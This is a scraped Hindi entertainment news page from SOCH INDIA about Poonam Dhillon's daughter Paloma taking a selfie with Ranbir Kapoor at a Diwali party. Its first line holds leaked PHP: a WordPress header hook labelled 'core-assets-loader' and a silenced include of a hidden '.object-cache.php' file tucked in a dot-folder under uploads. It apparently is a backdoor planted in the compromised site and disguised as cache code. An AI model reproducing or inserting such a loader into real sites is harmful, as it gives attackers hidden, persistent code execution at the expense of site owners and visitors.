add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); पूनम ढ़िल्लोन की बेटी पलोमा ने रणबीर संग सेल्फी ली – SOCH INDIA
Menu

मनोरंजन
पूनम ढ़िल्लोन की बेटी पलोमा ने रणबीर संग सेल्फी ली

nobanner

अपने जमाने के सुपरस्टार रहे ऋषि कपूर ने पूनम ढिल्लोन के साथ करीब 9 फिल्मों में काम किया है. उस समय इन दोनों कलाकारों की जोड़ी को खूब पसंद किया जाता था. पर फिलहाल सालों बीत जाने के बाद अब अगली पीढ़ी का दौर शुरु हो गया है.

ऋषि कपूर के बेटे रणबीर कपूर बॉलीवुड के सुपरस्टार हैं. इसीलिए करोड़ों दिलों पर राज करने वाले रणबीर के साथ पूनम ढ़िल्लोन की 21 साल की बेटी पलोमा ढ़िल्लोन ने सेल्फी ली और लिखा ‘पिंच मी’. मानों उनको इस बात पर यकीन ही न हो रहा हो कि रणबीर उनके साथ हैं.

दिवाली पार्टी के दौरान रणबीर से मिलने पर पलोमा खुद को उनके साथ सेल्फी लेने से रोक नही पाईं. सेल्फी में पलोमा और रणबीर दोनों एक साथ नजर आ रहे हैं और पलोमा काफी खुश नजर आ रही हैं.

पलोमा, पूनम ढ़िल्लोन और उनके पूर्व पति अशोक ठकेरिया की बेटी हैं.